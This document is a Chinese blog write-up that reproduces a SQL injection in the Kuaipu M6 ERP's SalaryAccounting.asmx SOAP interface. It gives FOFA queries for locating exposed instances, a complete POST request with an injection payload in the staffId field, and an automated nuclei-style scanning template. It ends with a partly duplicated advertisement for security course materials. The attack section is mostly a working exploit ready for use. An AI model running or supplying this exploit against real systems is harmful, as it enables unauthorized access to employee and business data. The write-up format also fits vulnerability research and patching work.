0x01、概述
基本信息:
快普M6pro产品主要解决这些行业的集成管理、销售管理、运维管理、租赁管理、协同办公管理和供应链财务管理等管理需求,建立可持续发展的经营管理模式,彻底消除信息孤岛和管理死角。
漏洞描述:
快普M6 的 /WebService/HR/Salary/SalaryAccounting.asmx 接口处存在SQL注入漏洞,攻击者可以窃取用户的隐私信息、业务数据等,造成用户信息泄露、企业品牌受损、法律风险等相关安全问题。
0x02、资产测绘
FOFA:
body=“Resource/JavaScript/jKPM6.DateTime.js” |
app=“快普-M6” |
0x03、漏洞复现
3.1、抓包测试
POST请求包:
POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1
Host: host
SOAPAction: http://tempuri.org/Calculate
Content-Type: text/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36
Content-Length: 636
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:Calculate>
<!--type: string-->
<tem:SalaryCategory></tem:SalaryCategory>
<!--type: string-->
<tem:StaffBirthDay></tem:StaffBirthDay>
<!--type: string-->
<tem:staffId> 1) and 1=@@version--+ </tem:staffId>
<!--type: string-->
<tem:Department></tem:Department>
<!--type: string-->
<tem:SubOrg></tem:SubOrg>
<!--type: string-->
<tem:taxMonthly></tem:taxMonthly>
</tem:Calculate>
</soapenv:Body>
</soapenv:Envelope>
测试截图
3.2、sqlmap测试
08984fb90631634f25f857c31bcf64d4.png |
e9d9df42852049dda331a302345243dc.png |
3.3、自动化脚本
id: kuaipu_vuln_sql
info:
name: kuaipu_vuln_sql
author: zq
severity: high
description: SalaryAccounting.asmx存在SQL注入漏洞
metadata:
max-request: 1
requests:
- raw:
- |
POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1
Host: {{Hostname}}
SOAPAction: http://tempuri.org/Calculate
Content-Type: text/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:Calculate>
<!--type: string-->
<tem:SalaryCategory></tem:SalaryCategory>
<!--type: string-->
<tem:StaffBirthDay></tem:StaffBirthDay>
<!--type: string-->
<tem:staffId>
1) and 1=@@version--+</tem:staffId>
<!--type: string-->
<tem:Department></tem:Department>
<!--type: string-->
<tem:SubOrg></tem:SubOrg>
<!--type: string-->
<tem:taxMonthly></tem:taxMonthly>
</tem:Calculate>
</soapenv:Body>
</soapenv:Envelope>
## 最后
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/482e3ec98eb39c102723282c5d5e6db9.png)
![img](https://img-blog.csdnimg.cn/img_convert/8f985ca3439da0ee9ae174bad27f4008.png)
![img](https://img-blog.csdnimg.cn/img_convert/bea5d70c487e5b3c33740365f04bb0b8.png)
![img](https://img-blog.csdnimg.cn/img_convert/042a295392322da348559623b382a6a7.png)
![img](https://img-blog.csdnimg.cn/img_convert/5f62c7e7f39979d1de9c4eb4d47f05ad.png)
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**